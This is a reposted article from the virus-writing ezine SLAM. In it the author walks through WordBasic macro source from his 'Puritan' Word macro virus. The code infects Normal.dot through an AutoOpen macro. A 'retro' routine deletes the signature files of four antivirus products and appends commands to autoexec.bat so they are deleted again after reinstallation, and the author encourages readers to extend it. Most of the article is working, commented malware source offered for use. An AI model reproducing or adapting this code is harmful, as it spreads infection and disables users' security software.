Copy Link
Add to Bookmark
Report

SLAM.006: Anti-anti-virus (retro) in macro virii

eZine's profile picture
Published in 
Slam
 · 2 years ago

ANTI-ANTI-VIRUS (RETRO) IN MACRO VIRII

It's quite simple to attack Non-Resident Anti-virus software, just delete or rename a specific file and your AV progi won't work anymore. Most of the time the user will reinstall the product so if you put a line in autoexec.bat that deletes or renames the file if it exists again the technique is quite useful. But I didn't discovered yet how to avoid the memory-resident AV software.

Here is some example I used in my Puritan (1) virus. The Puritan (1) virus is just a bad rip off concept virus, but with retro techniques and simple stealth, but eh don't blame me for having two days time to create a virus and a new technique so the virus contains some bugs, but the virus will be continued. There's the (1) for.
Here is a piece of the Puritan (1) virus to demonstrate a new technique to attack non-resident AV software.

'----------------------------------------------------------- 
'The AutoOpen macro.
'This is used for executing the Retro Macro, the macro with
'the retro technique in it. It will only be executed one time,
'At infection, because if Normal.Dot is already infected the
'macro will jump to Z and will not execute the Retro Macro again.
'This retro technique is only used for AV software in Win95 because
'I hadn't the time to get other AV progi's and to add them. Check
'the VBB magazine's for more from this.
'-----------------------------------------------------------
Sub MAIN
On Error Goto Z 'This is actually the same...
iM = CountMacros(0, 0) 'as the concept virus. For...
For i = 1 To M 'a full explained Puritan (1)...
If M$(i, 0, 0) = "Puritan" Then Y = - 1
End If 'virus, choose virii--->Puritan(1).
Next i

If Not Y Then
F$ = WindowsName$()
S$ = F$ + ":Puritan"
MacroCopy S$, "Global:Puritan"
S$ = F$ + ":Rtr"
MacroCopy S$, "Global:Retro"
S$ = F$ + ":FSAB"
MacroCopy S$, "Global:FileSaveAs"
S$ = F$ + ":FSAB"
MacroCopy S$, "Global:FSAB"
S$ = F$ + ":AOB"
MacroCopy S$, "Global:AOB"
S$ = F$ + ":ToolsMacro"
MacroCopy S$, "Global:ToolsMacro"
End If

ToolsMacro .Name = "Retro", .Run, .Show = 0, .Discription = "", .NewName = ""
'This will execute the macro Retro in Normal.Dot.

Z:

End Sub

'---------------
'The Retro Macro
'---------------

Sub MAIN

'Norton AntiVirus

On Error Goto 'Error Handler.
VF$ = "C:\Program Files\Norton AntiVirus\Virscan.Dat"
'VF$ (Virus File) is Virscan.dat.
If Files$(VF$) = "" Then Goto a 'If VF$ (Virscan.dat) doesn't...
'exists goto a.
SetAttr VF$, 0 'If it exists set the attributes...
'to zero (no attributes).
Kill VF$ 'Then delete the file.
'The next time you will start...
'your AV progi it cannot scan...
'any files.

a:
On Error Goto c 'Error Handler.
AB$ = "C:\Autoexec.bat" 'AB$ (AutoExec.bat) is C:\Autoexec.bat.
If Files$(AB$) = "" Then Goto c 'If AB$ (AutoExec.bat) doesn't...
'exists goto c.
SetAttr AB$, 0 'If it exists set the attributes...
'to zero (no attributes).

Open AB$ For Append As #1 'Then open AB$ (AutoExec.bat)...
'for appending.
Print #1, "@echo off" 'Put the line "@Echo Off" at the...
'end of the AutoExec.bat.
Print #1, "IF exist " + VF$ + " then del " + VF$
'Then Put the line 'IF exist...
'"C:\Program Files\Norton AntiVirus\
'Virscan.dat" then del "C:\Program
'Files\Norton AntiVirus\Virscan.Dat"

Close #1 'Close the AutoExec.bat


'----------------------------
'F-PROT W95

c: 'This is just the same as above...
On Error Goto d 'Only with F-PROT for W95.
VF$ = "C:\Program Files\F-Prot95\Fpwm32.dll"
If Files$(VF$) = "" Then Goto d
SetAttr VF$, 0
Kill VF$

d:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto f
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1


'----------------------------
'MCAFEE W95

f:
On Error Goto g
VF$ = "C:\Program Files\McAfee\Scan.dat"
If Files$(VF$) = "" Then Goto g
SetAttr VF$, 0
Kill VF$

g:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto h
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1


'----------------------------
'TBAV W95

h:
On Error Goto i
VF$ = "C:\Tbavw95\Tbscan.sig"
If Files$(VF$) = "" Then Goto i
SetAttr VF$, 0
Kill VF$

i:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto j
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1


J:

Z:
End Sub
'----------------------------------------------------------


Ok, yet it's only for 4 AV-programs but I know you can make lots of more routines such as these. But if you cannot watch out for our next issue and in the meantime make sure to look at the VBB magazines for more from us about this.

If anyone has an idea how to defeat TSR-AV programs e-mail me.

The_Neophyte@Hotmail.com

--- Neophyte ---

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT